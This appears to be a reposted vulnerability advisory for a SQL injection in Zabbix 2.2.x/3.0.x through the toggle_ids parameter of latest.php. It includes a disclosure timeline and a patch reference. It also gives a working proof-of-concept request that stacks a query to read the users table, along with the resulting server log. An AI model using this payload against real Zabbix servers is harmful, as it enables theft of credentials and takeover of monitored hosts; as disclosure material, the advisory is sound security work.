zoukankan      html  css  js  c++  java
  • Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability.

    ==========================================
    Title: Zabbix 3.0.3 SQL Injection Vulnerability
    Product: Zabbix
    Vulnerable Version(s): 2.2.x, 3.0.x
    Fixed Version: 3.0.4
    Homepage: http://www.zabbix.com 
    Patch link: https://support.zabbix.com/browse/ZBX-11023 
    Credit: 1N3@CrowdShield 
    ==========================================
     
     
    Vendor Description:
    =====================
    Zabbix is an open source availability and performance monitoring solution. 
     
     
    Vulnerability Overview:
    =====================
    Zabbix 2.2.x, 3.0.x and trunk suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the toggle_ids array in the latest.php page.
     
     
    Business Impact:
    =====================
    By exploiting this SQL injection vulnerability, an authenticated attacker (or guest user) is able to gain full access to the database. This would allow an attacker to escalate their privileges to a power user, compromise the database, or execute commands on the underlying database operating system.
     
    Because of the functionalities Zabbix offers, an attacker with admin privileges (depending on the configuration) can execute arbitrary OS commands on the configured Zabbix hosts and server. This results in a severe impact to the monitored infrastructure.
     
    Although the attacker needs to be authenticated in general, the system could also be at risk if the adversary has no user account. Zabbix offers a guest mode which provides a low privileged default account for users without password. If this guest mode is enabled, the SQL injection vulnerability can be exploited unauthenticated.
     
     
    Proof of Concept:
    =====================
     
    latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
    
    Result:
    SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
    latest.php:746 a require_once() a CProfile::flush() a CProfile::insertDB() a DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185
    
    
    Disclosure Timeline:
    =====================
    
    7/18/2016 - Reported vulnerability to Zabbix
    7/21/2016 - Zabbix responded with permission to file CVE and to disclose after a patch is made public
    7/22/2016 - Zabbix released patch for vulnerability
    8/3/2016 - CVE details submitted
    8/11/2016 - Vulnerability details disclosed

    referer:https://packetstormsecurity.com/files/138312

  • 相关阅读:
    tar打包split分割分解拆分大包文件
    SAP 语言码转换
    SAP audit S41909
    电商收付通系列<1>图片上传API
    Ladon7.4 CVE-2020-0688 Exchange序列化漏洞利用
    [反诈骗]入侵骗子电脑-揭秘冒充企业老板诈骗全过程
    Ladon插件-CVE-2020-1472域控提权漏洞EXP
    Winrm远程命令/端口复用后门/WinrmCmd/密码爆破
    〖教程〗Ladon WinrmExec远程执行命令
    Ladon插件-批量检测网站是否使用Shiro
  • 原文地址:https://www.cnblogs.com/sevck/p/5768370.html
Copyright © 2011-2022 走看看